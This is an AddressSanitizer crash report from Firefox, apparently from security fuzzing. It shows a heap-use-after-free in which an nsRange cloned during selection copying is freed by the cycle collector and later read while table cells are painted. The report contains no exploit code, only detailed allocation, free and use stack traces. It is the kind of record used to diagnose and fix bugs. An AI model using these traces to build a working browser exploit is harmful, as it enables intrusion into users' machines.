==119582==ERROR: AddressSanitizer: heap-use-after-free on address 0x60b000214ce8 at pc 0x7f46d6781c12 bp 0x7ffdc29fc1f0 sp 0x7ffdc29fc1e8
READ of size 8 at 0x60b000214ce8 thread T0
#0 0x7f46d6781c11 in operator! /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:308:36
#1 0x7f46d6781c11 in IsInSelection /home/worker/workspace/build/src/dom/base/nsRange.h:120
#2 0x7f46d6781c11 in nsRange::IsNodeSelected(nsINode*, unsigned int, unsigned int) /home/worker/workspace/build/src/dom/base/nsRange.cpp:202
#3 0x7f46da800fd3 in nsIFrame::IsSelected() const /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:10107:5
#4 0x7f46daaa29f6 in nsTableCellFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/tables/nsTableCellFrame.cpp:539:11
#5 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#6 0x7f46daab9bce in nsTableFrame::GenericTraversal(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1212:5
#7 0x7f46daaba703 in nsTableFrame::DisplayGenericTablePart(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&, nsDisplayTableItem*, void (*)(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&)) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1267:3
#8 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#9 0x7f46dab10731 in DisplayRows(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/tables/nsTableRowGroupFrame.cpp:231:5
#10 0x7f46daaba703 in nsTableFrame::DisplayGenericTablePart(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&, nsDisplayTableItem*, void (*)(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&)) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1267:3
#11 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#12 0x7f46daab9bce in nsTableFrame::GenericTraversal(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1212:5
#13 0x7f46daaba703 in nsTableFrame::DisplayGenericTablePart(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&, nsDisplayTableItem*, void (*)(nsDisplayListBuilder*, nsFrame*, nsRect const&, nsDisplayListSet const&)) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1267:3
#14 0x7f46daabb382 in nsTableFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/tables/nsTableFrame.cpp:1373:3
#15 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#16 0x7f46dab24b16 in BuildDisplayListForInnerTable /home/worker/workspace/build/src/layout/tables/nsTableWrapperFrame.cpp:207:5
#17 0x7f46dab24b16 in nsTableWrapperFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/tables/nsTableWrapperFrame.cpp:180
#18 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#19 0x7f46da7912d2 in DisplayLine(nsDisplayListBuilder*, nsRect const&, nsRect const&, nsLineList_iterator&, int, int&, nsDisplayListSet const&, nsBlockFrame*, mozilla::css::TextOverflow*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:6585:5
#20 0x7f46da7890ce in nsBlockFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:6677:7
#21 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#22 0x7f46da7b22f2 in nsCanvasFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:558:5
#23 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#24 0x7f46da87ebf2 in mozilla::ScrollFrameHelper::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:3497:7
#25 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#26 0x7f46da735b0a in mozilla::ViewportFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:63:5
#27 0x7f46da80417b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&, nsDisplayList*) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2381:5
#28 0x7f46da990123 in nsSubDocumentFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:471:7
#29 0x7f46da80417b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&, nsDisplayList*) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2381:5
#30 0x7f46da78d228 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2910:5
#31 0x7f46dac92672 in nsStackFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsStackFrame.cpp:59:5
#32 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#33 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#34 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
#35 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#36 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#37 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
#38 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#39 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#40 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
#41 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#42 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#43 0x7f46dac0f946 in nsDeckFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsDeckFrame.cpp:199:3
#44 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#45 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#46 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
#47 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#48 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#49 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
#50 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#51 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#52 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
#53 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#54 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#55 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
#56 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#57 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#58 0x7f46dac0f946 in nsDeckFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsDeckFrame.cpp:199:3
#59 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#60 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#61 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
#62 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#63 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#64 0x7f46dac0f946 in nsDeckFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsDeckFrame.cpp:199:3
#65 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#66 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#67 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
#68 0x7f46dac08048 in nsBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1352:3
#69 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#70 0x7f46dac0918f in nsBoxFrame::BuildDisplayListForChildren(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsBoxFrame.cpp:1392:5
#71 0x7f46dac64b7e in nsRootBoxFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/xul/nsRootBoxFrame.cpp:195:3
#72 0x7f46da78d923 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2954:7
#73 0x7f46da735b0a in mozilla::ViewportFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /home/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:63:5
#74 0x7f46da80417b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&, nsDisplayList*) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2381:5
#75 0x7f46da6623a6 in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&, unsigned int, nsDisplayListBuilderMode, nsLayoutUtils::PaintFrameFlags) /home/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3565:5
#76 0x7f46da565487 in mozilla::PresShell::Paint(nsView*, nsRegion const&, unsigned int) /home/worker/workspace/build/src/layout/base/PresShell.cpp:6481:5
#77 0x7f46d9d6c897 in nsViewManager::ProcessPendingUpdatesPaint(nsIWidget*) /home/worker/workspace/build/src/view/nsViewManager.cpp:484:7
#78 0x7f46d9d6be97 in nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) /home/worker/workspace/build/src/view/nsViewManager.cpp:416:9
#79 0x7f46d9d6f40d in nsViewManager::ProcessPendingUpdates() /home/worker/workspace/build/src/view/nsViewManager.cpp:1105:5
#80 0x7f46da4bfc8a in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2037:7
#81 0x7f46da4cbd25 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:305:7
#82 0x7f46da4cb9f4 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:327:5
#83 0x7f46da4ce063 in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:722:5
#84 0x7f46da4ce063 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:631
#85 0x7f46da4c9157 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::ParentProcessVsyncNotifier::Run() /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:508:9
#86 0x7f46d3c2db89 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
#87 0x7f46d3c2a480 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
#88 0x7f46d4a43eb4 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:124:5
#89 0x7f46d49b5028 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
#90 0x7f46d49b5028 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
#91 0x7f46d49b5028 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
#92 0x7f46d9ded82f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
#93 0x7f46dd430051 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
#94 0x7f46dd5edc0c in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4470:10
#95 0x7f46dd5ef708 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4647:8
#96 0x7f46dd5f09cc in XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4738:16
#97 0x4dfebf in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:234:10
#98 0x4dfebf in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:305
#99 0x7f46eefdb82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
#100 0x41c2e8 in _start (/home/ifratric/p0/latest/firefox/firefox+0x41c2e8)
0x60b000214ce8 is located 88 bytes inside of 112-byte region [0x60b000214c90,0x60b000214d00)
freed by thread T0 here:
#0 0x4b2a3b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
#1 0x7f46d3acb2c4 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2664:9
#2 0x7f46d3acaeb6 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2839:3
#3 0x7f46d53d990e in AsyncFreeSnowWhite::Run() /home/worker/workspace/build/src/js/xpconnect/src/XPCJSContext.cpp:145:34
#4 0x7f46d3c2db89 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
#5 0x7f46d3c2a480 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
#6 0x7f46d4a43ebf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
#7 0x7f46d49b5028 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
#8 0x7f46d49b5028 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
#9 0x7f46d49b5028 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
#10 0x7f46d9ded82f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
#11 0x7f46dd430051 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
#12 0x7f46dd5edc0c in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4470:10
#13 0x7f46dd5ef708 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4647:8
#14 0x7f46dd5f09cc in XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4738:16
#15 0x4dfebf in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:234:10
#16 0x4dfebf in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:305
#17 0x7f46eefdb82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
previously allocated by thread T0 here:
#0 0x4b2d5b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
#1 0x4e10cd in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
#2 0x7f46d6796c00 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
#3 0x7f46d6796c00 in nsRange::CloneRange() const /home/worker/workspace/build/src/dom/base/nsRange.cpp:2495
#4 0x7f46d67970ba in nsRange::CloneRange(nsIDOMRange**) /home/worker/workspace/build/src/dom/base/nsRange.cpp:2507:14
#5 0x7f46d66801d4 in nsHTMLCopyEncoder::SetSelection(nsISelection*) /home/worker/workspace/build/src/dom/base/nsDocumentEncoder.cpp:1426:5
#6 0x7f46d6596c5e in SelectionCopyHelper(nsISelection*, nsIDocument*, bool, short, unsigned int, nsITransferable**) /home/worker/workspace/build/src/dom/base/nsCopySupport.cpp:199:10
#7 0x7f46da97e9ee in nsAutoCopyListener::NotifySelectionChanged(nsIDOMDocument*, nsISelection*, short) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:6667:10
#8 0x7f46da95f019 in mozilla::dom::Selection::NotifySelectionListeners() /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:6254:5
#9 0x7f46da97806c in NotifySelectionListeners /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:2429:12
#10 0x7f46da97806c in mozilla::dom::Selection::Extend(nsINode&, unsigned int, mozilla::ErrorResult&) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:5762
#11 0x7f46da9533e7 in Extend /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:5474:3
#12 0x7f46da9533e7 in nsFrameSelection::TakeFocus(nsIContent*, unsigned int, unsigned int, mozilla::CaretAssociationHint, bool, bool) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:1873
#13 0x7f46da94ebaf in nsFrameSelection::MoveCaret(nsDirection, bool, nsSelectionAmount, nsFrameSelection::CaretMovementStyle) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:1160:14
#14 0x7f46da97c97d in mozilla::dom::Selection::Modify(nsAString_internal const&, nsAString_internal const&, nsAString_internal const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:6426:8
#15 0x7f46d730a949 in mozilla::dom::SelectionBinding::modify(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Selection*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/SelectionBinding.cpp:778:3
#16 0x7f46d7fdbf77 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2951:13
#17 0x7f46dda78c24 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:281:15
#18 0x7f46dda78c24 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:463
#19 0x7f46dda5ef88 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:514:12
#20 0x7f46dda5ef88 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2960
#21 0x7f46dda4411a in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:409:12
#22 0x7f46dda78eb7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:481:15
#23 0x7f46dda79552 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:527:10
#24 0x7f46de426f3c in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2865:12
#25 0x7f46d7b59632 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
#26 0x7f46d845fbbd in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
#27 0x7f46d845fbbd in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
#28 0x7f46d842a6f9 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1123:16
#29 0x7f46d842c5b4 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1297:20
#30 0x7f46d8416eb3 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:465:5
#31 0x7f46d841a744 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
#32 0x7f46da62158e in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1044:7
#33 0x7f46dcae3e7f in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7632:5
#34 0x7f46dcadfc44 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7426:7
#35 0x7f46dcae765f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7323:13
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:308:36 in operator!
Shadow bytes around the buggy address:
0x0c168003a940: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
0x0c168003a950: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
0x0c168003a960: fa fa fa fa fa fa 00 00 00 00 00 00 00 00 00 00
0x0c168003a970: 00 00 00 fa fa fa fa fa fa fa fa fa fd fd fd fd
